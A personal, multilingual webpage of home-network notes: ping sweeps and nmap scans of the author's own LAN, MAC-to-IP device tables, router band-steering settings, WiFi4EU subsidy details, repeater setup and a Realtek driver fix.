nicolau@mars:~$ sudo nmap -sP 192.168.1.0-255 Nmap done: 256 IP addresses (13 hosts up) nicolau@mars:~$ ip neigh | grep REACH 192.168.1.1 dev wlx984827ca1628 lladdr b0:8b:92:f9:dc:3c REACHABLE - router Masmovil 192.168.1.41 dev wlx984827ca1628 lladdr 14:bb:6e:31:93:20 REACHABLE - TV Samsung 192.168.1.123 dev wlx984827ca1628 lladdr b8:27:eb:12:c7:01 REACHABLE - R3 192.168.1.128 dev wlx984827ca1628 lladdr e0:98:06:b5:a3:fd REACHABLE - SB50 ESP_B5A3FD 192.168.1.129 dev wlx984827ca1628 lladdr b4:e6:2d:74:d5:57 REACHABLE - SP21 ESP_74D557 = endoll 192.168.1.130 dev wlx984827ca1628 lladdr a2:7c:11:b5:00:c4 REACHABLE - Huawei Io 192.168.1.131 dev wlx984827ca1628 lladdr 2a:d8:64:a8:76:91 REACHABLE - tablet A8 192.168.1.132 dev wlx984827ca1628 lladdr a8:9c:ed:ba:06:44 REACHABLE - Mi9 192.168.1.133 dev wlx984827ca1628 lladdr 7c:7a:91:8c:ce:d6 REACHABLE - T440 192.168.1.134 dev wlx984827ca1628 lladdr 98:48:27:ca:16:28 REACHABLE - MARS 192.168.1.136 dev wlx984827ca1628 lladdr 14:0a:c5:8c:dd:1e REACHABLE - Alexa 192.168.1.141 84:E3:42:0D:06:11 - Smart Switch 192.168.1.142 dev wlx984827ca1628 lladdr f4:cf:a2:c4:17:6e REACHABLE - smart IR "S06" (TP-Link like) 192.168.1.145 a8:80:55:2d:21:4d - "llum" A60 Smart Bulb RGBCW WiFi 192.168.1.200 dev wlx984827ca1628 lladdr dc:a6:32:7f:45:80 REACHABLE - R4 192.168.1.222 dev wlx984827ca1628 lladdr b8:27:eb:98:7c:9b REACHABLE - R0 192.168.1.229 dev wlx984827ca1628 lladdr 6c:1d:eb:f7:fa:a5 REACHABLE - Fronius

Per saber la IP de una MAC, fem :

  1. engeguem ping a tothom :

    • guindous :

      for /l %i in (1,1,254) do ping -n 1 -w 1 192.168.1.%i for IP in 192.168.1.{1..10}; do if ping $IP -c 1 > /dev/null; then echo $IP alive; else echo $IP dead; fi; done

    • linux :

      $ sudo nmap -sP 192.168.1.0-255 $ echo 192.168.1.{1..254} | xargs -n1 -P0 ping -c1 | grep "bytes from"

  2. mirem la cache del ARP :

    nicolau@mars:~$ arp -a {[ether] on wlx984827ca1628} _gateway (192.168.1.1) at b0:8b:92:f9:dc:3c tvsamsung (192.168.1.41) at 14:bb:6e:31:93:20 r3 (192.168.1.123) at b8:27:eb:12:c7:01 sb50 (192.168.1.128) at e0:98:06:b5:a3:fd sp21 (192.168.1.129) at b4:e6:2d:74:d5:57 ? (192.168.1.130) at a2:7c:11:b5:00:c4 ta8 (192.168.1.131) at 2a:d8:64:a8:76:91 mi9 (192.168.1.132) at a8:9c:ed:ba:06:44 t440 (192.168.1.133) at 7c:7a:91:8c:ce:d6 alexa (192.168.1.136) at 14:0a:c5:8c:dd:1e SmartSwitch (192.168.1.141) at 84:E3:42:0D:06:11 new Bulb A60 (192.168.1.145) at a8:80:55:2d:21:4d {20230808} r4 (192.168.1.200) at dc:a6:32:7f:45:80 r0 (192.168.1.222) at b8:27:eb:98:7c:9b fronius (192.168.1.229) at 6c:1d:eb:f7:fa:a5

    I una MAC en especial :

    arp -a | find "xx-xx-xx-xx-xx-xx"

Compte que el MARS no estigui a la xarxa de 5 GHz i el termometre o el Fronius a la de 2,4 GHz ...

{202112} Un resum de les MACs és : {go to ZTE "Local Network", LAN = DHCP or "Status"}

14:0a:c5:8c:dd:1e - Alexa - 192.168.1.132 - --- no responde a ping 14:13:33:8b:7e:ef - Minie wifi antena interna - 192.168.1.147 - 14:bb:6e:31:93:20 - TV Samsung - 192.168.1.41 - 1c:90:ff:43:c7:35 - termometre Ramon --- responde al ping solo 5 segundos cada minuto 1c:90:ff:da:ad:42 - termometre Sebas - 192.168.1.131 - 2a:d8:64:a8:76:91 - Samsung Tab A8 48:61:ee:47:a6:13 - Samsung Galaxy Tab A8 - 192.168.1.135 - 5a:4c:b3:d9:70:5f - Galaxy-A12 - 192.168.1.145 - 5a:cb:29:1b:1e:e4 - 2107113SG - 192.168.1.143 - 6c:1d:eb:f7:fa:a5 - Fronius - 192.168.1.229 - 70:70:fc:03:70:31 - Minie RJ45 enp2s0 - 70:70:fc:03:70:32 - Minie RJ45 eno1 - 7c:7a:91:8c:ce:d6 - T440 reinabtt - 192.168.1.132 - 84:E3:42:0D:06:11 - smart switch 94:b5:55:c7:05:bc - esp32 96:59:2b:5e:94:4b - - 192.168.1.139 - 98:48:27:ca:16:28 - Minie wifi antena externa - 192.168.1.150 - 9e:0b:29:3b:48:70 - iPhone - 192.168.1.144 - a2:7c:11:b5:00:c4 - tf Huawei Io Mate 20 - 192.168.1.142 - a4:77:33:c0:8f:da - Chromecast a8:80:55:2d:21:4d - new Bulb A60 - 192.168.1.129 a8:9c:ed:ba:06:44 - tf Mi9 SAG aa:7a:2d:b2:c3:0f - Tab A8 (?) - 192.168.1.139 - ac:5f:3e:3f:ec:bc - tf Xiaomi S7 Io - 192.168.1.133 - b0:8b:92:f9:dc:3c - router Masmovil ZTE:H3640 V10 - 192.168.1.1 - b2:8b:3b:ad:5c:e1 - - 192.168.1.137 - b4:e6:2d:74:d5:57 - SP21 ESP_74D557 smart plug - 192.168.1.128 - b8:06:0d:27:c4:93 - - 192.168.1.130 - b8:27:eb:12:c7:01 - R3 (IP fixe) - 192.168.1.123 - b8:27:eb:98:7c:9b - R0 (IP fixe) - 192.168.1.222 - c8:58:c0:27:ef:52 - - 192.168.1.141 - cc:8c:bf:52:73:de - smart meter dc:6a:e7:47:63:66 - tf Xiaomi 10 SAG - 192.168.1.137 - dc:a6:32:7f:45:80 - R4 (IP fixe) - 192.168.1.200 - e0:98:06:b5:a3:fd - SB50 ESP_B5A3FD smart bulb - (oldie) f4:cf:a2:c4:17:6e - smart IR

Find MAC vendor

La MAC del MARS es la de la antena wifi, es a dir, pot canviar si canvio de antena !

20221005 xarxa wifi Masmovil

Also, mind MARS "/etc/hosts" file :

Mi9 Sebas a8:9c:ed:ba:06:44 192.168.1.128 . Tablet A8 48:61:ee:47:a6:13 192.168.1.131 . T440 7c:7a:91:8c:ce:d6 192.168.1.132 . Huawei Io a2:7c:11.b5:00:c4 192.168.1.133 . MARS 98:48:27:ca:16:28 192.168.1.134 {fixe} Alexa 14:0a:c5:8c:dd:1e 192.168.1.136 . Smart Bulb e0:98:06:b5:a3:fd 192.168.1.138 . Smart Plug b4:e6:2d:74:d5:57 192.168.1.139 . DESKTOP-A96VFRC c8:58:c0:27:ef:52 192.168.1.140 . R0 b8:27:eb:98:7c:9b 192.168.1.222 {fixe} --- R3 b8:27:eb:12:c7:01 192.168.1.123 {fixe} --- R4 dc:a6:32:7f:45:80 192.168.1.200 {fixe} --- TV Samsung 14.BB.6E.31.93.20 . Fronius 6c:1d:eb:f7:fa:a5 192.168.1.229 {fixe}
xarxa wifi global (old)

La xarxa global (amb tendencia a anar tots a "a22") es :

--- Zyxel --- 2,4 GHz --------- wlan_gas2 ---. mac 40.4A.03.AF.5B.FB | channel 11 . --- ? 192.168.1.34 IP 192.168.1.2 | . --- Android ? 192.168.1.42 | . --- MARS 192.168.1.59 {eth0 fixe} D0:50:99:4E:81:EE . | 192.168.1.57 {wlan dhcp} 1C:BF:CE:E6:1E:65 Shenzhen Century | . --- Chromecast 192.168.1.68 {wlan dhcp} A4:77:33:C0:8F:DA Google, Inc. | . --- ESP_467EC3 {A60 ESP} 192.168.1.69 f4:cf:a2:46:7e:c3 Espressif Inc. | . --- HUAWEI_P10 {Irina} 192.168.1.37 d8:c7:71:fb:4d:71 . | . --- R4 192.168.1.73 {eth0 dhcp} dc:a6:32:7f:45:7c . | 192.168.1.200 {wlan fixe} dc:a6:32:7f:45:80 . | . --- Mi9 192.168.1.78 {wlan dhcp} A8.9C.ED.BA.06.44 Xiaomi Communications Co Ltd | . --- Samsung-Galaxy-S7-edge 192.168.1.40 d8:c4:6a:b1:d4:fa . | . --- LAPTOP-4UVQ1E1R (irina) 192.168.1.129 {wlan dhcp} 00.E0.4C.68.0F.39 . | . --- pi0alby 192.168.1.222 {wlan0 fixe} B8:27:EB:98:7C:9B Raspberry Pi Foundation | . --- Samsung Tab S - android-170eef6440f52da0 192.168.1.41 D8.C4.5A.B1.D4.FA - | . --- T60 192.168.1.60 {eth0 fixe} 00.24.7E.14.2D.14 . | 192.168.1.121 {wlan0 fixe} 00.16.CF.5B.4D.A6 . --- MitraStar --- 2,4 GHz ----- Convidats_SAG ---. mac nn.nn.nn.nn.nn.nn | . --- T440 (io) 192.168.1.37 {wlan dhcp} 7c:7a:91:8c:ce:d6 Intel Corporate | . --- new (io) . c8:58:c0:27:ef:52 . | --- MitraStar --- 2,4 GHz / 5 GHz ------ aa22 ---. mac CC:ED:DC:6C:6C:C9 {MitraStar Technology} | IP 192.168.1.1 . --- Samsung-Galaxy-S7-edge {sag} 192.168.1.36 D8:C4:6A:B1:D4:FA Murata Manufacturing Co | . --- T440 192.168.1.37 {wlan dhcp} 7C.7A.91.BC.CE.D6 . | . --- Mi9 192.168.1.38 {wlan dhcp} A8.9C.ED.BA.06.44 Xiaomi Communications Co Ltd | . --- Teckin SB50 ESP_2230A2 {menjador} n.n.n.n bc:dd:c2:22:30:a2 | . --- Teckin Smart Bulb SB50 - ESP_2230A2 192.168.1.39 {wlan dhcp} BC.DD.C2.22.30.A2 Espressif Inc. - smart bulb | . --- Teckin Smart Socket SP21 - ESP_74D557 n.n.n.n B4:E6:2D:74:D5:57 Espressif Inc. - smart plug | . --- Samsung-Galaxy-S7 {io} 192.168.1.39 AC:5F:3E:3F:EC:BC SAMSUNG ELECTRO-MECHANICS | . --- Samsung 192.168.1.41 14.BB.6E.31.93.20 - | . --- MARS 192.168.1.134 {wlan fixe} 98:48:27:ca:16:28 . | . --- Niko-PC 192.168.1.51 {wlan dhcp} . . | . --- odin 192.168.1.123 {wlan fixe} B8:27:EB:12:C7:01 Raspberry Pi Foundation | . --- Alexa n.n.n.n 14.0A.C5.8C.DD.1E {1} | . --- Huawei 192.168.1... D8:C7:71:FB:4D:71 HUAWEI TECHNOLOGIES CO | --- MitraStar --- 5 GHz ---------------- aa55 ---. mac CC:ED:DC:6C:6C:D1 | . --- Samsung SmartTV UE55 JU 6500 K . 14.BB.6E.31.93.20 Samsung Electronics Co.,Ltd | . --- . |

(*) MARS, SP21, Mi9 and S7 can switch between wifi's without problem !

{1} display Alexa MAC using Android App, clicking on "Echo" and "About" at bottom.

display MAC of an IP running

$ sudo nmap -sn 192.168.1.1-255 $ sudo nmap -sn 192.168.1.*

gas2 20201206 :

D8:C7:71:FB:4D:71 192.168.1.70 00:07:05 HUAWEI_P10-259454bfa057be 14:0A:C5:8C:DD:1E 192.168.1.85 00:09:29 Alexa B4:E6:2D:74:D5:57 192.168.1.87 00:09:25 ESP_74D557

map my ports

Try MAC to fabricant maping or mac vendors

ZyXel / GAS2 security

ZTE SmartWiFi

To improve the user experience, when the SmartWiFi functionality is Enabled, the 2.4GHz SSID and Password are automatically set equal to your 5GHz WiFi. If you want to configure separate 2.4GHz & 5GHz WiFi networks, you must disable SmartWiFi first

SmartWiFi Enable : On Off

Es troba a

Mitra / Tfca security

Mitra / band steering

Con esta opción activada los dispositivos conectados por WiFi al router cambian de forma automática de la banda de 2.4 GHz a la de 5 GHz dependiendo de que red WiFi tenga mejor señal y velocidad en ese momento.

comunidad Movistar

Para utilizar band steering no hace falta que el cliente tenga ningún requisito especial, solo que tenga doble banda wifi.
Cuando éste quiere conectarse a una red wifi lanza al aire paquetes probe request en cada banda esperando que las wifis próximas respondan con un probe response para elegir a continuación una red y autentificarse.
El router con band steering aprovecha esta situación para responder solo en la banda en la que le interesa conectar al cliente e ignorándolo en la otra.

To disable it :

  1. entra en el router 192.168.1.1
  2. configuracion avanzada
  3. wireless -- 5 GHz Basic
  4. find "Guest/Virtual Access Points"
  5. desmarcar el check en la SSID de 5 GHz que tiene el mismo nombre de la de 2,4 GHz
  6. pulsar en Apply/Save
  7. reiniciar el router

Amunt! Top Amunt!
Wifi networks at ESP

ONO Netgear CG 3100 D - UG

* --- Netgear Genie CG3100D - 192.168.1.1 - DHCP server . | . --- cable --- . | | | . --- 192.168.1.2 --- time-capsule-de-enric --- . --- cable --- . | | | | | . --- "airport" | | | . --- wireless --- . --- "Enric casa 5 GHz" --- . | | | | | . --- 192.168.1.3 --- Apple-TV | . --- "Enric casa " --- . | | | . --- 192.168.1.6 --- ? | | | . --- 192.168.1.10 --- iPad-Luisa | | | . --- 192.168.1.13 --- NPI26CE7C {impesora HP LaserJet M15w} | | | . --- 192.168.1.14 --- Huawei Y6 | | . --- wireless --- . --- "ONO6CCE" --- . | | | . --- 192.168.1.4 --- iPhone-11-Pro | | | . --- 192.168.1.7 --- iPad-de-Enric | | | . --- 192.168.1.99 --- Raspberry | . --- "convidats" --- . . --- 192.168.1.19 --- imacdeeadell720

Netgear manual del usuario

Time Capsule model A1409, setup guide

El "airport -s" detecta :

ONO6CCE c0:3f:0e:fe:6c:ce -48 6,-1 Y WPA(PSK/AES,TKIP/TKIP) WPA2(PSK/AES,TKIP/TKIP) Enric Casa 20:c9:d0:26:fd:51 -55 7 Y ES WPA2(PSK/AES/AES) Enric Casa 5 GHz 20:c9:d0:26:fd:52 -54 116 Y ES WPA2(PSK/AES/AES)

[p]


Amunt! Top Amunt!
xarxa wifi de'n Miquel

xarxa


Amunt! Top Amunt!
Wifi networks order

If you have multiple wifi networks available, Windows will try to connect to them in the order specified by

Control Panel -> Network and Internet -> Manage Wireless Networks

Right-click on any item and select "Move Up" or "Move Down" from the menu.


interesting wifi commands

In Raspbian we find :


wifi extenders


Amunt! Top Amunt!
wifi4eu

Homepage, 2 :

The European Commission wishes to promote free Wi-Fi connectivity for citizens and visitors in public spaces such as parks, squares, public building, libraries, health centres, and museums everywhere in Europe through WiFi4EU.

The budget of the WiFi4EU scheme is EUR 120 million between 2018 and 2020. It will support the installation of state-of-the-art Wi-Fi equipment in the centres of community life.

Assiganciona de rodalies de Barcelona

acm.cat : 20181213 - s'han publicat els ajuntaments que es beneficiaran de les subvencions WiFi4EU per instal·lar punts d’accés wifi gratuïts en espais públics.

gencat.cat : 42 milions de eurus
Els municipis guanyadors ja estan convidats a signar en el portal WiFi4EU un acord de subvenció amb INEA.
Una vegada signats aquests acords, els municipis podran contactar una empresa perquè els instal·li els punts d’accés wifi en espais públics.

diba - s’han concedit 2.800 bonus de 15.000€ per a instal·lar WIFI als municipis europeus beneficiaris de l’ajut.

Condicionants, locals i europeus
Requisits tècnics WIFI4EU

Sou un dels municipis subvencionats i esteu en el procés d'estudiar la vostra proposta de cara als ciutadans. Aquí teniu alguns dels detalls tècnics que heu de complir:

Punts d'accés mínims (depenent de la quantitat de punts d'accés exteriors i interiors)

Requisits que s'ha de garantir que compleixen els punts d'accés:

WIFI4EU a Torrelles

Guanyadors

2020/Febrer : s'instalen 8 punts wifi :

hw

Cambium Networks P500, Gigabit IP67 802.11ac Outdoor Wi-Fi Access Point

Model hvin-c000100p500a

Part pl-e500intra-rw

500 €

Specs

AP features

FREQUENCY BANDS 2.4 GHz: 2.4 – 2.4835 GHz Channels 1 – 13 (ETSI/CE), Channels 1 – 11 (US) 5 GHz: 5.15 – 5.85 GHz
SSID SECURITY 16
MAX CONCURRENT CLIENTS 256
MAX RANGE Client: 213 m (700 Ft); Range will vary based on RF conditions & client capability. Mesh: 2.4 GHz: 3,000 m (9840 Ft.) 5 GHz: 1,500 m (4,900 Ft.)

WIFI features

Wifi to router - JB 202501

IEEE 802.11 - specifies the set of medium access control (MAC) and physical layer (PHY) protocols for implementing wireless local area network (WLAN) computer communication.

OFDM

  1. a la antena NanoBean / LiteBean M5, fem un escaneig de les xarxes envoltants
  2. trobem la que ens interessa i la seleccionem
  3. posem la PSK (Pre Shared Key) i estem conectats
20250531- Innjoo Wifi repeater WR1200

Dual-band WiFi Repeater/Extender with a maximum data transfer rate of 1200 Mbps (300 Mbps on 2.4 GHz and 867 Mbps on 5 GHz)
IP 192.168.10.1, password "admin"
P/N IJ-WH1200-WHT, codi 357763

Dispone de tres modos de uso:

The InnJoo IJ-WH1200-WHT wireless repeater supports three main configuration modes, designed to suit different network needs:

What's the difference between "AP mode" and "router mode" ?
(?) AP has no DHCP neither NAT, no routing (?)

What's the difference between "AP mode" and "repeater mode" ?
(DeepSeek) AP requires a wired connection, same SSID

ChatGPT : how to configure InnJoo IJ-WH1200-WHT to expand a WiFi but without creating a new IP range

To configure your InnJoo IJ-WH1200-WHT repeater to expand your WiFi network without creating a new IP range, you need to:

This keeps all devices on the same local network, avoids double NAT, etc


Wifi problems I have
sctx query timeout

It is a RTL88x2BU driver issue

Aug 11 12:41:07 mars kernel: [ 7694.621460] RTW: WARN LPS sctx query timeout, operation abort!! Aug 11 12:43:10 mars kernel: [ 7817.596479] RTW: WARN LPS sctx query timeout, operation abort!! Aug 11 12:43:59 mars kernel: [ 7865.980108] RTW: WARN LPS sctx query timeout, operation abort!! Aug 11 12:45:23 mars kernel: [ 7950.651471] RTW: WARN LPS sctx query timeout, operation abort!!

Solucio : lock your WiFi connection profile to the BSSID of your access point - url

  1. display own MAC :

    nicolau@mars:~$ ifconfig wlx984827ca1628: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.1.134 netmask 255.255.255.0 broadcast 192.168.1.255 inet6 fe80::d7fc:a7a0:c6ed:a9a5 prefixlen 64 scopeid 0x20<link> ether 98:48:27:ca:16:28 txqueuelen 1000 (Ethernet)

  2. find the MAC of the best/chosen AP :

    nicolau@mars:~$ iwconfig wlx984827ca1628 IEEE 802.11AC ESSID:"b22" Nickname:"<WIFI@REALTEK>" Mode:Managed Frequency:5.26 GHz Access Point: E6:5B:3B:0E:F2:DE

  3. edit your connection using nm-connection-editor command and set BSSID - pcworld (as set DNS)

Amunt! Top Amunt!
Wifi links


Ep ! Site under construction. Escriu-me !
Updated 20201229 (a)  
Uf !